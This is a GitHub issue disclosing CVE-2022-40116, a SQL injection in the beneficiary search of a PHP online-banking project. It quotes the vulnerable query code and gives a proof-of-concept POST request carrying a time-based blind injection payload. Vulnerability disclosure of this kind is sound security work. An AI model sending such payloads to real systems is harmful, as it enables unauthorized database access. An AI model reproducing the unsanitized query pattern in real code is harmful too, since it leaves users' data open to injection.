CVE-2022-40116: Found a vulnerability · Issue #13 · zakee94/online-banking-system

Vulnerability file address

net-banking/beneficiary.php from line 74,The $_POST[‘search’] parameter is controllable, the parameter search can be passed through post, and the $search is not protected from sql injection, line 92 $result1 = $conn->query($sql1); made a sql query,resulting in sql injection

… … … if (isset($_POST[‘submit’])) { $back_button = TRUE; $search = $_POST[‘search’]; $by = $_POST[‘by’];

                if ($by == "name") {
                    $sql1 = "SELECT cust\_id, first\_name, last\_name, account\_no FROM customer
                    WHERE cust\_id=".$row\["benef\_cust\_id"\]." AND (first\_name LIKE '%$search%'
                    OR last\_name LIKE '%$search%' OR CONCAT(first\_name, ' ', last\_name) LIKE '%$search%')";
                }
                else {
                    $sql1 = "SELECT cust\_id, first\_name, last\_name, account\_no FROM customer
                    WHERE cust\_id=".$row\["benef\_cust\_id"\]." AND account\_no LIKE '$search'";
                }
            }

… … …

    <?php
        $result1 = $conn\->query($sql1);

… … …

POC

POST /net-banking/beneficiary.php HTTP/1.1 Host: www.bank.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3 Content-Length: 16

submit=&search=’ AND (SELECT 2893 FROM (SELECT(SLEEP(5)))EXvW)-- WklL

Attack results pictures